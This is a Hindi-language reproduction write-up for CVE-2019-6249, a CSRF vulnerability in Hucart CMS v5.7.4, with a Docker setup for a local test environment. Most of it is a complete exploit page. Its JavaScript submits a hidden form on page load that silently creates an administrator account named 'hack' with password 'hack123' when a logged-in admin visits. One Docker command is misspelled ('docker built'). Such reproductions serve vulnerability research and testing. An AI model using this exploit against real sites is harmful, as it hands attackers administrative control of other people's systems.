
CVE-2019-6249 Hucart cms पुनरुत्पादन वातावरण
भेद्यता का नाम: Hucart cms v5.7.4 CSRF भेद्यता जो किसी भी प्रशासक खाते को जोड़ सकती है
रिपोर्ट दिनांक: 2019-01-13
भेद्यता खोजकर्ता: AllenChen ([email protected])
उत्पाद होमपेज: http://www.hucart.com/
सॉफ्टवेयर लिंक: http://www.hucart.com/
संस्करण: v5.7.4
CVE क्रमांक: CVE-2019-6249\
Hucart cms v5.7.4 संस्करण में एक CSRF भेद्यता मौजूद है। जब प्रशासक लॉग इन करता है और नीचे दिए गए CSRF परीक्षण पृष्ठ तक पहुँचता है, तो 'hack' नामक एक प्रशासक खाता जोड़ा जा सकता है।
EXP कोड इस प्रकार है: 'hack' उपयोगकर्ता नाम और 'hack123' पासवर्ड वाला एक प्रशासक खाता जोड़ें।
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='adm_enabled' value='1' />";
fields += "<input type='hidden' name='act_type' value='add' />";
fields += "<input type='hidden' name='adm_id' value='' />";
var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
Docker वातावरण में, निम्नलिखित कमांड चलाएँ
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart